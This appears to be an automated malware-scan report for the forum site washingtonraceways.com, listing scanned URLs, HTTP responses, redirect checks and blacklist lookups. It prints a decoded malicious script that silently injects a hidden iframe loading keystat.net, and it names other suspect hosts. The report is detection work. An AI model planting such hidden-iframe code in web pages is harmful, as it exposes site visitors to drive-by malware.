Scanned pages/files
Request | Server response | Status |
http://washingtonraceways.com/ | HTTP/1.1 303 See Other Connection: close Date: Tue, 27 Jan 2015 12:52:26 GMT Location: http://www.washingtonraceways.com/activity.php?s=e024869112f3fde77a165596e24caf15 Server: Apache Content-Length: 0 Content-Type: text/html Set-Cookie: bb_sessionhash=e024869112f3fde77a165596e24caf15; path=/; HttpOnly Set-Cookie: bb_lastvisit=1422363147; expires=Wed, 27-Jan-2016 12:52:27 GMT; path=/ Set-Cookie: bb_lastactivity=0; expires=Wed, 27-Jan-2016 12:52:27 GMT; path=/ | clean |
http://www.washingtonraceways.com/activity.php?s=e024869112f3fde77a165596e24caf15 | 200 OK Content-Length: 18131 Content-Type: text/html | clean |
http://www.washingtonraceways.com/clientscript/vbulletin-core.js?v=422 | 200 OK Content-Length: 51946 Content-Type: application/x-javascript | clean |
http://washingtonraceways.com/clientscript/vbulletin_activitystream.js?v=422 | 200 OK Content-Length: 10072 Content-Type: application/x-javascript | clean |
http://washingtonraceways.com/clientscript/vbulletin_md5.js?v=422 | 200 OK Content-Length: 5464 Content-Type: application/x-javascript | clean |
http://washingtonraceways.com/index.php?s=e024869112f3fde77a165596e24caf15 | HTTP/1.1 303 See Other Connection: close Date: Tue, 27 Jan 2015 12:52:31 GMT Location: http://www.washingtonraceways.com/activity.php?s=e024869112f3fde77a165596e24caf15 Server: Apache Content-Length: 0 Content-Type: text/html Set-Cookie: bb_lastvisit=1422363151; expires=Wed, 27-Jan-2016 12:52:31 GMT; path=/ Set-Cookie: bb_lastactivity=0; expires=Wed, 27-Jan-2016 12:52:31 GMT; path=/ | clean |
http://www.washingtonraceways.com/test404page.js | 404 Not Found Content-Length: 44551 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below).
Decoded script:
    if (document.getElementsByTagName('body')[0]) {
        iframer();
    } else {
        document.write("<iframe src='http://keystat.net/' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
    }
    function iframer() {
        var f = document.createElement('iframe');
        f.setAttribute('src', 'http://keystat.net/');
        f.style.visibility = 'hidden';
        f.style.position = 'absolute';
        f.style.left = '0';
        f.style.top = '0';
        f.setAttribute('width', '10');
        f.setAttribute('height', '10');
    <iframe src='http://keystat.net/' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>
Antivirus reports:
http://apiajax.info/?id=200667 | 500 Can't connect to apiajax.info:80 Content-Length: 187 Content-Type: text/plain | clean |
http://apiajax.info/test404page.js | 500 Can't connect to apiajax.info:80 Content-Length: 187 Content-Type: text/plain | clean |
http://mobilesniffer.ru/?id=200667 | 500 Can't connect to mobilesniffer.ru:80 Content-Length: 191 Content-Type: text/plain | clean |
http://washingtonraceways.com/register.php?s=e024869112f3fde77a165596e24caf15 | 200 OK Content-Length: 24465 Content-Type: text/html | clean |
http://washingtonraceways.com/clientscript/vbulletin_ajax_nameverif.js?v=422 | 200 OK Content-Length: 2502 Content-Type: application/x-javascript | clean |
http://washingtonraceways.com/clientscript/vbulletin_ajax_suggest.js?v=422 | 200 OK Content-Length: 8155 Content-Type: application/x-javascript | clean |
http://washingtonraceways.com/faq.php?s=e024869112f3fde77a165596e24caf15 | 200 OK Content-Length: 17185 Content-Type: text/html | clean |
http://washingtonraceways.com/activity.php?s=e024869112f3fde77a165596e24caf15 | 200 OK Content-Length: 18127 Content-Type: text/html | clean |
http://washingtonraceways.com/search.php?s=e024869112f3fde77a165596e24caf15&do=getnew&contenttype=vBForum_Post | 200 OK Content-Length: 15217 Content-Type: text/html | clean |
http://washingtonraceways.com/search.php?s=e024869112f3fde77a165596e24caf15&do=getnew&contenttype=vBForum_Event | 200 OK Content-Length: 15267 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: washingtonraceways.com
Result:
HTTP/1.1 303 See Other
Connection: close
Date: Tue, 27 Jan 2015 12:52:26 GMT
Location: http://www.washingtonraceways.com/activity.php?s=e024869112f3fde77a165596e24caf15
Server: Apache
Content-Length: 0
Content-Type: text/html
Set-Cookie: bb_sessionhash=e024869112f3fde77a165596e24caf15; path=/; HttpOnly
Set-Cookie: bb_lastvisit=1422363147; expires=Wed, 27-Jan-2016 12:52:27 GMT; path=/
Set-Cookie: bb_lastactivity=0; expires=Wed, 27-Jan-2016 12:52:27 GMT; path=/
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: washingtonraceways.com
Referer: http://www.google.com/search?q=washingtonraceways.com
Result:
The result is similar to the first query. No suspicious redirects were found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=washingtonraceways.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://washingtonraceways.com/
Result: washingtonraceways.com is not infected or malware details are not published yet.